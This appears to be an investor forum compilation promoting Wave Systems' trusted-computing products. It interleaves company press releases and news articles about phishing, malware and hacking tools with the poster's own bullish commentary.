Wave Systems Corp. (NASDAQ: WAVX), the Trusted Computing Company, today announced Wave Knowd, a new web service available for preview that significantly reduces the vulnerability and use of passwords by leveraging the unique identity of computing devices. With a simple integration of Wave Knowd, any website can establish reliable and consistent identity relationships with the devices its customers use most often for Internet services. Wave Knowd, which signifies “Known Devices,” is being tested by partners to provide the backbone for general purpose machine identity.
“The maturation of the web mandates a change in how we, and our computing devices, connect to the web,” said Steven Sprague, Wave CEO. “With cable television, satellite radio, bank kiosks and mobile phones, the service relationship is tied to the endpoint device. The web needs the security and simplicity of this same model, where our computing devices themselves play an added role in authentication. I access dozens of web services every day from the computer in my home office, and want those sites to know and trust my PC so they’ll stop continually asking me to log in. Wave Knowd enables that trust.”
To make web authentication stronger and simpler, Wave Knowd provides a new approach to signing on and accessing Cloud and Internet services. From online banking to business services and even consumer gaming, passwords are failing to provide a level of security that either service providers or users can trust. Knowd is built upon the concept that only known devices should ever access a protected network. Knowd incorporates all of your access and identity solutions together to establish a relationship of trust between users’ computing devices, and the web services they access.
“We interact online using so many devices now, but from a security perspective those devices aren’t all equal. Accessing medical records or confidential business files from my kid’s smartphone is certainly not as trustworthy as connecting from my business PC with an encrypted drive,” continued Mr. Sprague. “Wave Knowd is all about making the Web simpler and safer, and that new foundation of trust begins with known devices, and known capabilities.”
Once machine identity is established, any web site—from gaming, social networking or shopping; to banking, business and financial services—can use Wave Knowd to create a reliable and persistent identity for the connecting device. Knowd allows Web sites to streamline access for users who repeatedly log on from trusted devices, while bolstering security. Initial authentication creates a unique and anonymous relationship between each computing device and each web service accessed, and then the level of trust between the two grows over time. Knowing the device can also help the site prevent fraud and phishing, or simply provide quicker no-password access. Wave is the partner helping to create and manage these relationships.
“Wave Systems was the obvious choice to provide ID Dataweb’s attribute exchange with device identity services,” said David Coxe, CEO at ID Dataweb. “In Knowd, Wave has provided a system that is rooted in state of the art device security technologies such as the Trusted Platform Module and other secure elements, while also offering a simple web based integration. It’s easy to identify if a connecting device is highly trusted, or whether it requires added screening and security.”
ID Dataweb uses Wave’s Knowd solution as part of the Identity Ecosystem supported through a grant from the U.S. Department of Commerce’s National Institute of Standards and Technology’s NSTIC initiative (National Strategy for Trusted Identities in Cyberspace). ID Dataweb has created a standards-based platform to simplify online identity verification using OpenID credentials.
Providing the Tools to Manage Trust in the Cloud: What’s Your Trust Score?
Wave Knowd is a powerful enhancement for any website. The endpoint identity service links an individual users’ unique device identity, with the Internet services that are typically protected only by username and password access. Users are prompted by their cloud service provider to register their primary computing devices to create a unique and persistent device identity relationship with their Internet services and service providers. No personal ID information is obtained by Wave, as Knowd works purely as a machine identity service. Furthermore, registered devices are given a unique ID for every service provider, establishing a separate trust relationship with each service.
Wave Knowd asserts a Trust Score that helps both consumers and cloud services or relying parties to determine the level of trust granted to each specific computing device. For example, a home PC that is used regularly for banking will quickly build a high Trust Score. Users can achieve a higher Trust Score by installing a small software application (Wave Knowd currently supports Windows 7 and 8, with Apple and Android to follow later this year). Business-class PCs containing a standard Trusted Platform Module (TPM) can establish even greater trust by leveraging the TPM security chip to create and securely store a unique device ID.
Knowd provides a web service with a new capability to enable or disable features based on the device that the user is actively using, providing a new security option for the end user. Perhaps an account password can only be reset from the user’s registered home computer and not from anywhere in the world, thereby linking in all of the user’s investment in the security of their home, from their alarm system to the doorman. Every web service can benefit from integrating Wave Knowd as part of the user’s experience
Office envy: 56 percent of companies around the globe now embrace remote work
https://www.zdnet.com/article/office-envy-56-percent-of-companies-around-the-globe-now-embrace-remote-work/
New report puts data behind the growing trend toward remote work around the world.
A newly released report offers a snapshot of the spread of remote work arrangements globally. Survey data collected by the authors of the 2018 Global State of Remote Work report show that 56 percent of companies internationally support remote work in some capacity.
The report also found that more than half of respondents (52 percent) spent at least one day per week outside the office.
Updated annually, the report is sponsored by Owl Labs, a video conferencing hardware company. The survey this year included 3,028 employees across six continents and comprising 23 countries.
The number one reason respondents reported choosing remote work arrangements was productivity and focus. Country by country, the reasons were more varied. In North America, workers are more likely to work remotely to avoid a commute. In Africa, money savings was the primary motivator.
There are some other compelling tidbits in the report, as well. South America is embracing its fully remote workers, it turns out, but Asia is not. Globally, 44 percent of companies do not allow remote work in any capacity, while 16 percent are fully remote.
Male respondents surveyed reported being 8 percent more likely to work remotely than women.
The rise of remote work globally has spawned a booming industry of hardware and app-based solutions designed to bridge distance and lower barriers to working remotely. While its tough to peg the size of that sector, anecdotal indicators suggest its massive.
Slack, the unicorn of remote work tech, now has a valuation of $7 billion, and enterprise video conferencing could be a $10.5 billion market by 2026.
==================================================================
It sounds like the market for VSC 2.0 could be expanding Worldwide. With all the partners that Wave has it seems like their better security could be a hit with many companies Worldwide that use a VPN for remote work.
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Key Features:
• Full lifecycle management of virtual smart cards
• Intuitive interface to create (or delete) virtual smart cards
• Command line option to create and delete virtual smart cards
• Flexible PIN policies
• Helpdesk-assisted PIN reset and recovery
• Generates reports for compliance
• Integrates with Active Directory
• Supports familiar use cases
? Virtual Private Network (VPN)
? Local logon
? Remote logon
? Remote desktop access
? Intranet/Extranet
? Cloud applications
Amazon Web Services Customers Can Hack AWS Cloud And Steal Data, Says Oracle CTO Larry Ellison
https://www.forbes.com/sites/bobevans1/2018/10/26/amazon-web-services-customers-can-hack-aws-cloud-and-steal-data-says-oracle-cto-larry-ellison/#a52553376cfb
Excerpt: "One customer can see the other customer's data, Amazon can see your data, and the customer can change the Amazon code and hack the system," Oracle CTO Larry Ellison said last week.
==================================================================
An Amazon AWS customer could protect him/herself by using Scrambls and a great two factor authentication product like Wave VSC 2.0. imo.
==================================================================
Protect Content in the Cloud with Scrambls for Files
Scrambls Brings Privacy & Control to Social File Sharing with Instant Encryption
https://www.wavesys.com/buzz/pr/protect-content-cloud-scrambls-files
Palo Alto, CA -
November 13, 2012 -
Today scrambls announced Scrambls for Files as the next enhancement to the free service designed to allow you to control your social media, manage your online privacy, and decide who to share with. Scrambls for Files brings the power of scrambls into Microsoft Windows, for easy encryption of all types of files and folders before they are sent over the open Web.
Cloud storage and social media services have become increasingly prevalent in the market, with consumers quick to embrace the benefits. Yet there are vulnerabilities in the current model of uploading information into the cloud, and then trusting third parties to apply the proper privacy, security and authentication policies. Scrambls for Files brings a more secure method of data transfer for sharing files and folders anywhere you happen to be on the Web. With scrambls, users even maintain control to change who can read messages and files even after the fact.
“This is an important solution to consider for anyone that wants to safely and securely use cloud storage services like Dropbox™ or Microsoft SkyDrive™. Only members of your specified scrambls groups are aware of and can access the content, and you maintain the dynamic control to change those permissions anytime,” said Michael Sprague, scrambls co-creator. “Cloud storage and social media services see only the encrypted data, and we don’t even see it here at scrambls—we only manage the keys and groups as a trusted third party.”
The power lies in the dynamic groups offered by scrambls. Users choose exactly who can see and read anything scrambled, by forming groups (based upon email address, Facebook contacts/groups, etc.). With the same simplicity of scrambls text messages, users just choose what individuals or groups are permitted to read a file. Scrambls will decrypt and display both text and files. Retract messages and/or files by changing the groups or individuals authorized; schedule a specific time for messages and files to appear or expire; and much more.
“Scrambls can be used to encrypt your posts and files for enterprise-caliber protection wherever they travel across the networked social web,” continued Sprague. “Secure what you place in cloud storage and take control over who can read sensitive information. The keys to unlock your encrypted data remain separate from the content, only to be brought back together when the people you authorize look to pull that message down from the cloud. Everyone else will only see scrambled text.”
While encryption concepts are not new, they’ve traditionally been a burden to use. The simplicity and power of scrambls’ groups mechanism sets it apart. Sharing scrambled files does not require circulation of a password or management of enterprise encryption key servers. Users simply choose who is authorized to read anything and those people or groups are granted rights—all they need is a scrambls account of their own.
Scrambls is a platform that can be used with any service, to add the protection of scrambls into any web service and infrastructure you already know and use (Facebook, DropBox, email, Active Directory, etc.). The new model of information sharing supports file and folder encryption for all Microsoft Windows platforms.
Introducing Scrambls Professional for Power Users:
Scrambls continues to introduce more functionality, expanding what users can do with their groups & connections. Scrambls for Files is the latest of these innovations, following the recent Facebook Integration for login and group creation and several mobile apps.
With Scrambls for Files, a premium offering of scrambls will be introduced for heavier usage that brings added benefits to scrambls’ most active users. Scrambls is committed to keeping basic use free for any consumer to secure their social communications over the open Web. The professional version allows unlimited use of Scrambls for Files, along with more features and functionality that are yet to come.
Wavexpress.
https://investorshub.advfn.com/boards/read_msg.aspx?message_id=28876167
The link above is one of barge's many great posts.
Wavexpress had the capability to monetize and multicast videos securely and that seems like a valuable combination to a cable company or to a YouTube.
With storage so much cheaper per gigabyte and larger capacities more available over the years, why not save your favorite video on a SSD or HDD for later viewing?! Ten years has gone by since Barge's post and there are many millions more TPMs in the market to help make microtransactions securely possible. People like having libraries of movies and Wavexpress could have the protection to offer newer movies sooner. imo. Its too bad Steven and Michael Sprague work for Rivetz given what they know about Wavexpress. I'm sure there are other ex-employees who know a lot about Wavexpress too! It was shut down many years ago but 10 years later and many millions more TPMs could help to breathe life into it once again!
One-Fifth of US Consumers Never Return to Breached Brands
https://www.infosecurity-magazine.com/news/fifth-consumers-never-return/?utm_source=dlvr.it&utm_medium=twitter
Over a fifth (21%) of US consumers will never return to a brand that has suffered a data breach, according to new research providing a timely reminder of the need for effective cybersecurity.
Contact center payments firm PCI Pal polled 2000 US consumers to produce a State of Security report which highlights the importance of trust and privacy to the average American.
As well as those who will never return to a business post-breach, a sizeable majority (83%) claimed they would stop spending for several months after a breach or serious incident.
In addition, 45% said they spend less with brands they perceive to have insecure data practices, and over a quarter (26%) will not give a company their business if they don’t trust it with their data.
Consumers are concerned not just about online security. Over a quarter (28%) questioned how their data is recorded over the phone and over two-fifths (42%) said they’re uncomfortable sharing sensitive data like credit card details over the phone.
The findings chime somewhat with RSA Security research from earlier this year which revealed that 69% of global consumers are prepared to boycott any company they believe does not take data protection seriously.
It also found the vast majority (62%) blame the company first in the event of a data breach, rather than the hacker.
The findings should be another reminder to organizations of the importance of a strong cybersecurity posture.
PCI Pal COO, James Barham, argued the findings reveal a change in how US consumers are prioritizing security and privacy.
“Consumer-facing brands should pay attention — not just adopting stronger security practices but incorporating them into their marketing and communications strategies if they want to keep customers loyal and spending with them,” he added.
It’s a change in consumer behavior being driven to a certain extent globally by the advent of the GDPR. Although it’s an EU law, it applies to any company processing EU citizens’ data, so the advent of the first major fine for a US company will be a significant moment in awareness raising.
Just this week, Apple CEO Tim Cook argued for a GDPR-style federal data privacy law.
==================================================================
This is another selling point for Wave VSC 2.0! Wave VSC 2.0 helps prevent breaches and could prevent the loss of customers.
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
White paper:
https://www.wavesys.com/virtual-smart-card-2.0-from-wave
Cyber-threats are everywhere, but with Wave Virtual Smart Card 2.0 (Wave VSC 2.0) enterprises have a hardware-based, tokenless, two-factor authentication security solution with the security of a hardware token solution and the convenience and cost savings of a software token solution.
Wave VSC 2.0 delivers strong two-factor authentication using the Trusted Platform Module (TPM), the embedded security chip built into enterprise PCs. Wave empowers IT with management of the TPM and VSC 2.0. Companies successfully use Wave VSC 2.0 to secure VPN access, web applications and other certificate-based applications, like Wi-Fi with 802.1x, remote desktop, or Windows-user login. Use the security that’s already been deployed and save money with Wave VSC 2.0.
Every month we see headlines highlighting mammoth breaches (i.e. EBay, JP Morgan Chase, Sony, Target, etc…). In each case, millions of records were stolen, corporate images were tarnished, and enormous costs were incurred as a result. And equally disturbing, more often than not the attacks go undetected and as a result important information is stolen.
INTERTRUST, WAVE SYSTEMS TO INTEGRATE INTERTRUST DRM INTO WAVE CONTENT DISTRIBUTION SERVICES AND EMBASSY HARDWARE
https://investorshub.advfn.com/boards/read_msg.aspx?message_id=31563151
A post from a favorite poster, Countryboy.
Wave may have been developing before the TPM 1.2 (open and programmable chip) with the Embassy Chip, but it still seems like Wave Software developed for the Trusted Client could be used for the TPM 1.2 and 2.0 since they are open and progammable. And with a Wave/Intertrust agreement it seems that Wave could have a big leg up on secure DRM that the market would want to use now (in light of my previous post).
It's Now Legal to Hack DRM to Repair Your Own Devices
https://gizmodo.com/its-now-legal-to-hack-drm-to-repair-your-own-devices-1830002757
In a blow to manufacturers that use digital rights management (DRM) protections to prevent consumers from tinkering with their own property, the Library of Congress has adopted new rules allowing anyone to hack the software of their devices for the purpose of performing repairs. The changes officially go into effect on October 28th.
Advocates in the “right to repair” movement have a lot of complaints about the various methods corporations use to control who repairs their products, box people into software updates, and force obsolescence. One of the complaints is that copyright law in the U.S. has made it illegal to break DRM that blocks a users access to a device’s firmware. Motherboard first noticed that all changed today.
Every three years the U.S. Copyright Office reviews its own copyright rules and proposes various exemptions that have to be approved by the Librarian of Congress. On Thursday, the order was released adopting sweeping exemptions to DRM protections on devices like smartphones, tablets, smart TVs, cars, smart home appliances. Previously, the Copyright Office only allowed consumers to hack the firmware of tractors when they want to do a repair. The new rules make it legal to break into practically any device that has been “lawfully acquired” as long as the intent is to the diagnose, maintain or repair the device, “and is not accomplished for the purpose of gaining access to other copyrighted works.”
Practically speaking, the repercussions of this decision aren’t that big of a deal. Nathan Proctor leads consumer advocacy group US PIRG’s right to repair initiatives. He told Motherboard that his reading of the new rules essentially gives people the ability to restore their devices to the factory settings. Making modifications to the firmware is still prohibited and hackers are only allowed to break the DRM in order to bring the product back “to a state of working in accordance with its original specifications.”
It’s a small victory. And the wider effort to get right to repair laws for hardware on the books in multiple states continues.
=================================================================
If there was an online movie service called Wavexpress, DRM may require hardware (TPM) to harden and protect the service. Wave had an agreement many years ago with Intertrust to harden DRM with the TPM. This may help prevent the hacking of DRM for movies. Sony/Phillips bought out Intertrust, but may want to exercise the Wave/Intertrust agreement. After seeing this article it seems that many service providers would want the protection of hardware (TPM) for their content.
Phishing Report Shows Microsoft, Paypal, & Netflix as Top Targets
https://www.bleepingcomputer.com/news/security/phishing-report-shows-microsoft-paypal-and-netflix-as-top-targets/
A new phishing report has been released that keeps track of the top 25 brands targeted by bad actors. Of these brands, Microsoft, Paypal, and Netflix are the top brands impersonated by phishing attacks.
Email security provider Vade Secure tracks the 25 most spoofed brands in North America that are impersonated in phishing attacks. In their Q3 2018 report, a total of 86 brands are tracked, which consist of 95% of all attacks detected by the company.
Overall, Vade Secure has stated that phishing attacks increased by 20.4% in the 3rd quarter with the most targeted being Microsoft, followed by PayPal, Netflix, Bank of America, and Wells Fargo.
-see the link for the top 25
Cloud based services and financial companies remain the two most targeted industries with Microsoft being the top targeted brand as attackers try to gain access to Office 365, One Drive, and Azure credentials.
"The primary goal of Microsoft phishing attacks is to harvest Office 365 credentials,"stated Vade Secure's report. "With a single set of credentials, hackers can gain access to a treasure trove of confidential files, data, and contacts stored in Office 365 apps, such as SharePoint, OneDrive, Skype, Excel, CRM, etc. Moreover, hackers can use these compromised Office 365 accounts to launch additional attacks, including spear phishing, malware, and, increasingly, insider attacks targeting other users within the same organization."
Office 365 phishing emails typically indicate that the recipient's account has been suspended or disabled and then prompts them to login to resolve the issue. These phishing forms are almost identical to a legitimate Office 365, and by creating a sense of urgency, the attackers hope the victims will be less vigilant as they enter their credentials.
Followed by Microsoft, are PayPal phishing schemes where attackers try to gain access to victim's money and Netflix, which is used to steal credit card information.
Of particular interest is that attackers tend to follow a pattern as to what days they send the most volume of phishing emails. According to the report, most work related attacks tend to occur during the week with Tuesday and Thursday being the largest volume days. For Netflix, the most targeted days are Sunday when people are taking a break to watch some TV.
Phishing attacks become more targeted
Vade Secure has also noticed that attackers are starting to decrease the amount of times a particular URL is used in a phishing campaign. Instead attackers are using unique URLs in each phishing email in order to bypass mail filters.
"What should be more concerning to security professionals is that phishing attacks are becoming more targeted," continued Vade Secure's report. "When we correlated the number of phishing URLs against the number of phishing emails blocked by our filter engine, we found that the number of emails sent per URL dropped more than 64% in Q3. This suggests that hackers are using each URL in fewer emails in order to avoid by reputation-based security defenses. In fact, we’ve seen sophisticated phishing attacks where each email contains a unique URL, essentially guaranteeing that they will bypass traditional email security tools."
Protecting yourself from phishing attacks
As phishing attacks become more sophisticated, they also become harder to detect. Using cloud services, attackers are now able to secure their phishing forms with SSL certificates from well known and trusted companies such as Microsoft and Cloudflare. This allows the forms to look authentic to victims.
As you can see from phishing attack below, the login form looks legitimate, the site is on a Microsoft owned domain, and the page is secured. To many, this would appear as a legitimate Microsoft form. In reality, the attacker is hosting their form on a Microsoft cloud service in order to create this sense of legitimacy.
Therefore, it is always important to scrutinize a site before entering any login credentials. If the URL looks strange, there is incorrect spelling, grammar is incorrect, or something does not feel right then you should not enter any account credentials. Instead contact your administrator or the company itself if you are concerned your account has problems.
==================================================================
Wave has an authentication product for each of the top three companies identified in the article that will stop phishing dead in its tracks. Microsoft cloud phishing could be stopped by Wave VSC 2.0, Paypal phishing could be stopped by Wave Knowd, and Netflix phishing could be stopped by Wavexpress. Its unbelievable that Wave would have three amazing authentication products to stop this problem and this problem still continues to this day!!! With these products the hacker or attacker has to have the target person's device (with TPM) in order to be able to log on applications such as Microsoft cloud, Netflix and Paypal. A stolen credential by the hacker will do him/her no good. These three companies are an example, as the potential authentication (TPM) market is much larger.
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
=================================================================
https://www.wavesys.com/buzz/pr/wave-knowd-introduces-new-model-internet-authentication-without-passwords
Wave Knowd Introduces New Model for Internet Authentication Without Passwords
Knowd ‘Trust Score’ Assures User Identity when Accessing Web Services
=================================================================
Wavexpress:
https://www.wavesys.com/buzz/pr/wave-q2-2008-revenues-rise-41-record-20-million-continued-growth-software-license-sales
** PR doesn't reveal the capability of Wavexpress with regard to authentication with the TPM. Wavexpress was shut down years ago, but their technology was awesome and it could have benefits today. imo. Unfortunately, the Spragues are with a different company and they know what Wavexpress's true capabilities are!
Zero-days, fileless attacks are now the most dangerous threats to the enterprise
https://www.zdnet.com/article/zero-days-fileless-attacks-are-now-the-most-dangerous-threats-to-the-enterprise/
These attacks cost the average organization millions and SMBs are the worst affected
Zero-day vulnerabilities and fileless attacks are now deemed the most dangerous threats to the enterprise.
According to a study conducted by the Ponemon Institute and sponsored by Barkly, called the "2018 State of Endpoint Security Risk report," nearly two-thirds of enterprise players have been compromised in the past 12 months by attacks which originated at endpoints, which the organization says is a 20 percent increase year-on-year.
Such attacks can prove costly, with the average company enduring a cost of $7.12 million, or $440 per endpoint.
Small to medium-sized businesses, which may not have the same cybersecurity solutions or teams in place due to investment limitations, suffer more -- with the same damage cost of endpoints close to double at $763.
In total, the average cost of a successful endpoint-based attack has increased by roughly 42 percent year-on-year.
According to the survey, which recorded the responses of 660 IT and cybersecurity professionals, zero-day vulnerabilities and fileless attacks are today's biggest threats to organizations.
Zero-day vulnerabilities are previously unknown bugs which are unpatched by vendors. These types of security flaws, depending on the severity and the affected software, can be used to conduct attacks including account hijacking, network compromise, and data theft.
Fileless attacks, however, leverage exploits or launch scripts from memory in order to circumvent detection by antivirus solutions.
"76 percent of successful attacks leveraged unknown and polymorphic malware or zero-day attacks, making them four times more likely to succeed in compromise compared to traditional attack techniques," Ponemon says.
In last year's survey, the organization estimated that 29 percent of attacks faced by the enterprise in 2017 were fileless and this was expected to rise to 35 percent this year.
Respondents of this year's survey estimated that 37 percent of attacks launched against their companies were zero-day attacks -- a 48 percent increase from 2017 -- whereas 35 percent utilized fileless techniques.
Resolving zero-day vulnerabilities requires the creation of patches, but implementing these fixes can often be delayed due to the need to triage threats.
Not all zero-days are created equal and they will not hold the same risk for every organization -- but it just takes one to be overlooked for a successful attack to take place.
The research estimates the average delay in applying a patch to a vulnerable endpoint is 102 days due to triage, testing, and implementation requirements.
Together with fileless attacks which can dance around traditional, signature-based security solutions, organizations are struggling to keep up with modern security issues -- and so 70 percent have already replaced or plan to replace antivirus solutions for more modern alternatives within the next 12 months.
High false positive rates, management complexity, and inadequate protection were cited as the top frustrations of IT professionals when it comes to standard antivirus solutions.
"This increase in successful attacks have exposed a gap in protection that existing solutions and processes are not addressing," said Larry Ponemon, Chairman and Founder of the Ponemon Institute. "Antivirus products missed more attacks than they stopped in 2018 and organizations believe their current antivirus is effective at blocking only 43 percent of attacks."
Cybersecurity is an ongoing problem for SMBs and enterprise players alike. Data breaches alone are becoming a daily occurrence, with British Airways, the US State Department, the Pentagon, and Facebook making up only a handful of recent victims.
=================================================================
https://www.wavesys.com/malware-protection
Excerpt:
Wave’s solution: start with the device
If antivirus software doesn’t work, what does? The Wave alternative relies not on superficial layers of software but on standards-based hardware: self-encrypting drives (SEDs) and Trusted Platform Modules (TPMs), or security chips, that are already embedded in many of your computers and mobile devices. This hardware provides you with secure storage. When you turn the SED and TPM on and manage them with Wave, you suddenly have a broad, deep view into your network. Among other things, you’ll know immediately whether any one of your devices—computers, laptops, tablets, smartphones—has been tampered with. But Wave is proactive too: you can block the kinds of behaviors that invite malware in. Wave's Endpoint Monitor provides early detection for these low-lying sneaky attacks.
==================================================================
https://www.wavesys.com/products/wave-endpoint-monitor
Excerpts:
Detect attacks before it’s too late
Malware can do its work for weeks or months before you ever know it’s there. But with Wave Endpoint Monitor, you can spot malware before it has a chance to cause damage.
Antivirus software can’t detect rootkits and other malware; it works at the level of the OS and isn’t very good at seeing deeper into the system. For example, it can’t tell whether the boot record is lying. The Wave alternative is to work with the Trusted Platform Modules (TPMs), or security chips, embedded in your devices. By using the TPM to attest to the security of the device each time that device boots, Wave looks below the operating system and can help detect threats lurking there. Every time a device boots up, Wave Endpoint Monitor makes a comparison against previous boot values, and if anything deviates from the norm, it alerts you immediately.
An open standard means Wave works with everything
Wave Endpoint Monitor works on your existing hardware, across platforms. That’s because our solutions are based on an open standard that’s already been implemented on many laptops and is now working its way onto mobile devices. We’re talking about those TPMs. We just don’t think that expensive new equipment and vendor lock-in are great selling points.
Key Features:
Easy security compliance
• Comports with NIST guidelines for BIOS integrity
Data protection
• Ensures that you can trust the integrity of your measurements for central analysis
• Real-time alerts for zero-day detection of APTs
• Get Windows 8 Malware protection now—WEM covers previous versions of Windows
Simplicity
• Uses standards-based security that’s in every PC you own
• Measurement notifications and reports can be customized for your processes and work flows
• Centralized, remote activation and management of your TPMs
• E-discover which PCs in your organization are enabled for endpoint monitoring
No compromises
• Ensure host integrity—without expensive hardware or excessive administrative overhead
Password and credit card-stealing Azorult malware adds new tricks
https://www.zdnet.com/article/password-and-credit-card-stealing-azorult-malware-adds-new-tricks/
Malware can now steal more types of cryptocurrecny and comes with other updates, likely in response to a free version being leaked online
A form of password, credit card details and cryptocurrency-stealing malware has been updated, making it even more potent for cyber criminals.
The Azorult malware has been been operating since 2016 and enables crooks to steal credentials including passwords, credit card details, browser histories and contents of cryptocurrency wallets from victims.
Now a new version of it is being advertised in an underground forum, as uncovered by researchers at tech security company Check Point, who describe it as "substantially updated".
New features include the ability to steal additional forms of crpytocurrency from the wallets of victims - BitcoinGold, electrumG, btcprivate (electrum-btcp), bitcore and Exodus Eden.
Reflecting the fast pace of malware development, the developer of Azorult also boats improvements to the cryptocurrency wallet stealer components and improvements to the loader.
Researchers also note some behind-the-scenes changes compared to previous versions of the malware, including a new encryption method to obfuscate the domain name, as well as a new key for connecting to the command and control server.
This new version of the malware first appeared for sale on October 4 - shortly after source code for Azorult versions 3.1 and 3.2 were leaked online. Check Point has already seen the free tools being used to power Gazorp, a malware builder which allows users to essentially generate an earlier version of Azorult at no cost.
It's likely this which has spurred the author of Azorult into releasing a new and improve version of the malware for sale.
"It is plausible that the Azorult's author would like to introduce new features to the malware and make it worthy as a product in the underground market," said Israel Gubi, malware researcher at Check Point.
The latest version of Azorult is delivered through the RIG exploit kit, using uses vulnerabilities in Internet Explorer and Flash Player to launch JavaScript, Flash, and VBscript-based attacks to distribute malware to users.
Previous versions of Azorult have also been known to be distributed via phishing emails which encourage potential victims to download a malicious Microsoft Word attachment, which when run, takes advantage of exploits in order to download and install the malware.
With Azorult seemingly reliant on known vulnerabilities to spread, users can go a long way to protect themselves from falling victim to it by ensuring they've installed the relevant software updates and patches.
=================================================================
Kaspersky says it detected infections with DarkPulsar, alleged NSA malware
https://www.zdnet.com/article/kaspersky-says-it-detected-infections-with-darkpulsar-alleged-nsa-malware/
Victims located in Russia, Iran, and Egypt; related to nuclear energy, telecommunications, IT, aerospace, and R&D.
Kaspersky Lab said today that it detected computers infected with DarkPulsar, a malware implant that has been allegedly developed by the US National Security Agency (NSA).
"We found around 50 victims, but believe that the figure was much higher," Kaspersky Lab researchers said today.
"All victims were located in Russia, Iran, and Egypt, and typically Windows 2003/2008 Server was infected," the company said. "Targets were related to nuclear energy, telecommunications, IT, aerospace, and R&D."
Kaspersky researchers were able to analyze DarkPulsar because it was one one of the many hacking tools that were dumped online in the spring of 2017.
The hacking tools were leaked by a group of hackers known as the Shadow Brokers, who claimed they stole them from the Equation Group, a codename given by the cyber-security industry to a group that's universally believed to be the NSA.
DarkPulsar went mostly unnoticed for more than 18 months as the 2017 dump also included EternalBlue, the exploit that powered last year's three ransomware outbreaks --WannaCry, NotPetya, and Bad Rabbit.
Almost all the infosec community's eyes have been focused on EternalBlue for the past year, and for a good reason, as the exploit has now become commodity malware.
But in recent months, Kaspersky researchers have also started to dig deeper into the other hacking tools leaked by the Shadow Brokers last year.
They looked at FuzzBunch, which is an exploit framework that the Equation Group has been using to deploy exploits and malware on victims' systems using a CLI interface similar to the Metasploit pen-testing framework.
They also looked at DanderSpritz, a FuzzBunch plugin that works as a GUI application for controlling infected victims.
DarkPulsar is a FuzzBunch "implant," a technical term that means "malware," that's often used together with DanderSpritz.
But in a report released today, Kaspersky researchers said the DarkPulsar code included in the Shadow Brokers leak isn't the entirety of DarkPulsar.
"We analyzed this tool and understood that it is not a backdoor itself, but the administrative part only," Kaspersky said.
A major breakthrough came when they realized that some constants from the DarkPulsar administrative interface code were also most likely used by the actual malware.
Researchers created special rules to detect these constants in files scanned by the Kaspersky antivirus. This is how they detected the roughly 50 computers that were still infected with the actual DarkPulsar malware.
Based on the functions they found in the DarkPulsar admin interface, researchers say the malware is primarily used as a backdoor to infected computers.
The malware's main features are its ability to run arbitrary code via a function named "RawShellcode" and the ability to upload other DanderSpritz payloads (malware) via the "EDFStageUpload" function, greatly expanding the operator's hold and capabilities on an infected system.
Kaspersky researchers also believe that the number of computers that have been infected with DarkPulsar is most likely larger than the 50 detections they found.
The malware also included a self-delete function, which Equation Group operators likely used to cover their tracks after the Shadow Brokers dumped their tools online.
"So the 50 victims are very probably just ones that the attackers have simply forgotten," researchers said.
As for who is behind these hacks, Kaspersky didn't say. It is unclear if the Shadow Brokers managed to get their hands on the full DarkPulsar malware but then opted not to include the actual backdoor in the package of leaked tools.
These 50 infections could very easily be the work of Equation Group cyber-espionage operations or the work of the Shadow Brokers themselves.
==================================================================
These two articles discuss malware and Wave has Wave Endpoint Monitor which doesn't have to be modified to detect complicated strains of malware, its ready to detect malware out of the box. If the computers in article 2 were using Wave Endpoint Monitor in the first place, Kaspersky wouldn't have had the malware to detect! imo.
Besides using WEM in article one to detect the malware, Wave VSC 2.0 would have rendered the password stealing moot due to a PIN number and the TPM protecting the computer.
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/malware-protection
https://www.wavesys.com/products/wave-endpoint-monitor
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
https://www.wavesys.com/
Security warning: Attackers are using these five hacking tools to target you
https://www.zdnet.com/article/security-warning-attackers-are-using-these-five-hacking-tools-to-target-you/
Free - but powerful - tools are being used by everyone ranging from cyber criminals to nation-state operators, says a report by five government security agencies
Attackers ranging from nation-state backed espionage groups to cyber criminal operations are increasingly turning to openly available hacking tools to help conduct campaigns, the cyber security authorities of Australia, Canada, New Zealand, the UK and US have warned.
The research by the nations involved in the 'Five Eyes' intelligence sharing arrangement provides a snapshot of some of threats posed by cyber actors worldwide by detailing some of the commonly available tools used in attacks.
They are all freely available -- often on the open web -- and include remote access trojans, web shells and obfuscation tools. Combinations of some or all of these have been used in attack campaigns by some of the most prolific attackers around.
"Tools and techniques for exploiting networks and the data they hold are by no means the preserve of nation states, or criminals on the Dark Web," said the report.
"Experience from all our countries makes it clear that, while cyber actors continue to develop their capabilities, they still make use of established tools and techniques. Even the most sophisticated groups use common, publicly-available tools to achieve their objectives," the report adds.
The UK's National Cyber Security Agency notes that the list of tools is far from exhaustive, but it's designed to help network defenders protect against some of the most commonly used free hacking tools.
Remote Access Trojans
Perhaps the most potentially damaging of the dangers detailed in the report are remote access trojans -- malware which is secretly installed onto an infected system providing a backdoor to observe all activity and enabling the attacker to carry out commands that lead to data being stolen.
The particular example given in the report is JBiFrost, a trojan typically employed by low-skilled cyber criminals but with the capability to be exploited by state actors. What makes JBiFrost so potent is that it is cross-platform, with the ability to operate on Windows, Linux, MAC OS X, and Android.
Often delivered via a phishing email, it allows attackers to move across networks and install additional software. This particular RAT is publicly available and the cyber security agencies said they have observed it being used in targeted attacks against critical national infrastructure owners and their supply-chain operators.
Web Shells
Web shells are malicious scripts that attackers upload to targets after an initial compromise in order to gain remote administrative capabilities, providing those behind the attack with the potential to really get their hooks into the target system -- as well as being used to pivot to other areas of the network.
One example of freely available Web Shells is China Chopper, which has been used widely by attackers to remotely access compromised web servers. Once installed on a system, the China Chopper web shell server can be accessed by the attacker at any time -- among other things it can copy, rename, delete, and even change the time-stamp of files.
Mimikatz
Mimikatz is an open-source utility used to retrieve clear text credentials and hashes from memory and has been available since 2007. While it wasn't designed as a hacking tool and has legitimate use-cases, it is also used as a means of gaining access to credentials and admin privileges.
It's been used in a wide variety of campaigns by various groups -- this includes the NotPetya and BadRabbit ransomware attacks, where it was employed to extract administrator credentials from Windows machines in order to help facilitate spread of the attack
PowerShell Empire
Designed as a legitimate penetration testing tool in 2015, it didn't take attackers long to realise they could use PowerShell Empire to help conduct malicious activity. The tool allows attackers to escalate privileges, harvest credentials, exfiltrate information, and move laterally across a network.
